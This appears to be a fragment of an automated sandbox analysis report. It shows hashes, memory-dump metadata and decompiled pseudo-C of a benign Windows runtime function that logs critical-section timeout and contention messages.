                                                    • Instruction ID: fd7b3177028e67019477120e033060d9566fc900d890ecd1f5259a072521cace
                                                    • Opcode Fuzzy Hash: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                                    • Instruction Fuzzy Hash: ECA022B3A30088000820B3F23C0C3AAE20C80C32BF0200CEFC00C3000B808BC008302F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    C-Code - Quality: 53%
                                                    			E04B5FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                    				void* _t7;
                                                    				intOrPtr _t9;
                                                    				intOrPtr _t10;
                                                    				intOrPtr* _t12;
                                                    				intOrPtr* _t13;
                                                    				intOrPtr _t14;
                                                    				intOrPtr* _t15;
                                                    
                                                    				_t13 = __edx;
                                                    				_push(_a4);
                                                    				_t14 =  *[fs:0x18];
                                                    				_t15 = _t12;
                                                    				_t7 = E04B0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                    				_push(_t13);
                                                    				E04B55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                    				_t9 =  *_t15;
                                                    				if(_t9 == 0xffffffff) {
                                                    					_t10 = 0;
                                                    				} else {
                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                    				}
                                                    				_push(_t10);
                                                    				_push(_t15);
                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                    				return E04B55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                    			}

                                                     Instruction addresses of the decompiled lines above (address column of the listing): 0x04b5fdda, 0x04b5fde2, 0x04b5fde5, 0x04b5fdec, 0x04b5fdfa, 0x04b5fdff, 0x04b5fe0a, 0x04b5fe0f, 0x04b5fe17, 0x04b5fe1e, 0x04b5fe19, 0x04b5fe19, 0x04b5fe19, 0x04b5fe20, 0x04b5fe21, 0x04b5fe22, 0x04b5fe25, 0x04b5fe40

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B5FDFA
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B5FE01
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B5FE2B
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                     • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp
                                                     • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
                                                    • Instruction ID: d00cd1b4e69d074f5c794ac4cfe881c38314a4255791ce421afad2a924c4fe8c
                                                    • Opcode Fuzzy Hash: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
                                                    • Instruction Fuzzy Hash: FEF0F032200201BFEA251A45DC06F73FF6AEB84730F244395FA68561E1EA62F86096F4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%